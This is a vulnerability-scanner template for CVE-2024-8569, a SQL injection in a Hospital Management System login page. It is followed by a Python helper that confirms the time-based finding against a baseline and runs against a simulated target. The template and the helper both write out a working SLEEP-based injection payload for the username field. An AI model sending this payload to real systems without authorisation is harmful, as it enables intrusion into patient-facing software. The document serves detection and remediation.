CVE-2024-8569.yaml
id: CVE-2024-8569

info:
  name: Hospital Management System - SQL Injection (user-login.php, username)
  author: ProjectDiscoveryAI
  severity: high
  description: |
    A vulnerability classified as critical has been found in code-projects Hospital Management System 1.0.
    The username argument of /hms/user-login.php is used in a SQL query without sanitisation, so a remote,
    unauthenticated attacker can inject SQL through the login form.
  remediation: |
    Pass the username and password to the database through prepared statements or parameterised queries,
    so that user input is never parsed as SQL. Validate and sanitise inputs in addition to that, not instead of it.
    Keep the application updated and apply the vendor's security patches.

http:
  - method: POST
    path:
      - "{{BaseURL}}/hms/user-login.php"

    headers:
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0

    body: |
      username=admin' AND (SELECT 4737 FROM (SELECT(SLEEP(5)))tNIf) AND 'VAgb'='VAgb&password=admin123&submit=&submit=

    # Time-based and error-based evidence are alternatives, not a pair: the SLEEP() payload parses
    # cleanly, delays the response and produces no SQL error, so requiring both matchers with `and`
    # would suppress the finding. `duration>=5` is an absolute threshold; a target that is slow for
    # other reasons can satisfy it, so confirm a hit against a baseline request before reporting.
    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - "duration>=5"

      - type: regex
        part: body
        regex:
          - "error in your SQL syntax"
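The template decides from a single response whether SLEEP(5) fired, which is enough for a scanner but not for confirming a finding: any target that takes five seconds to answer the login form matches `duration>=5`. The following is an added example, not part of the template or of the Hospital Management System code: it posts the same form body with the same payload, measures a baseline first, requires the injected request to be slower than the baseline by roughly the requested sleep, repeats the probe with SLEEP(0) as a control, and still accepts a MySQL syntax error in the body as independent evidence. The `send` callable interface and `fake_target`, a constructed stand-in for the login page that merely sleeps when told to, are assumptions made for this example; a real run would replace `fake_target` with an HTTP client that returns the elapsed time.

```python
import re
import time
from typing import Callable, Dict, Tuple

# The string the template's regex matcher looks for in the response body.
SQL_ERROR = re.compile(r"error in your SQL syntax", re.IGNORECASE)

# Assumed interface for this example: post one form body to /hms/user-login.php,
# return (HTTP status, response body, elapsed seconds).
Sender = Callable[[str], Tuple[int, str, float]]


def sleep_payload(seconds: int) -> str:
    """The template's username payload with the SLEEP() argument made configurable (5 in the template)."""
    return f"admin' AND (SELECT 4737 FROM (SELECT(SLEEP({seconds})))tNIf) AND 'VAgb'='VAgb"


def login_body(username: str, password: str = "admin123") -> str:
    """Same form fields the template posts, unencoded exactly as the template sends them."""
    return f"username={username}&password={password}&submit=&submit="


def absolute_threshold(elapsed: float, delay: int = 5) -> bool:
    """What the template's own `duration>=5` matcher concludes from one response."""
    return elapsed >= delay


def check_time_based(send: Sender, delay: int = 5, tolerance: float = 0.5) -> Dict[str, object]:
    """
    Baseline-aware confirmation of the time-based injection:
      1. time a harmless login attempt (baseline),
      2. inject SLEEP(delay) and require the response to exceed baseline by about `delay`,
      3. inject SLEEP(0) as a control and require the response to be back at baseline speed,
      4. treat a MySQL syntax error in either injected response as evidence on its own.
    """
    if delay < 1:
        raise ValueError("delay must be at least 1 second")
    _, _, base = send(login_body("admin"))
    _, body1, t1 = send(login_body(sleep_payload(delay)))
    _, body2, t2 = send(login_body(sleep_payload(0)))
    delayed = (t1 - base) >= delay - tolerance
    control_ok = (t2 - base) < delay - tolerance
    sql_error = any(SQL_ERROR.search(b) is not None for b in (body1, body2))
    return {
        "baseline_s": round(base, 3),
        "injected_s": round(t1, 3),
        "control_s": round(t2, 3),
        "delayed": delayed,
        "control_ok": control_ok,
        "sql_error": sql_error,
        "vulnerable": (delayed and control_ok) or sql_error,
    }


def fake_target(vulnerable: bool, latency: float = 0.05) -> Sender:
    """
    Constructed stand-in for the login page (no HTTP, no database): it answers
    "Invalid login" after `latency` seconds and, only when `vulnerable`, also honours
    an injected SLEEP(n) the way MySQL would when the payload reaches the query.
    """
    sleep_call = re.compile(r"SLEEP\((\d+)\)")

    def send(body: str) -> Tuple[int, str, float]:
        started = time.monotonic()
        time.sleep(latency)
        match = sleep_call.search(body)
        if vulnerable and match:
            time.sleep(int(match.group(1)))
        return 200, "<html><body>Invalid login</body></html>", time.monotonic() - started

    return send


if __name__ == "__main__":
    # delay=2 keeps the demo short; the template itself uses SLEEP(5).
    for label, target in (("vulnerable target", fake_target(True)),
                          ("clean but slow target", fake_target(False, latency=2.5))):
        verdict = check_time_based(target, delay=2)
        print(label, verdict, "template alone would say:", absolute_threshold(verdict["injected_s"], 2))
```

The control probe with SLEEP(0) is what separates an injected delay from a target that is simply slow: a slow target stays slow in all three requests, so the baseline cancels it out and `delayed` is false, while the template's absolute threshold reports it as a hit.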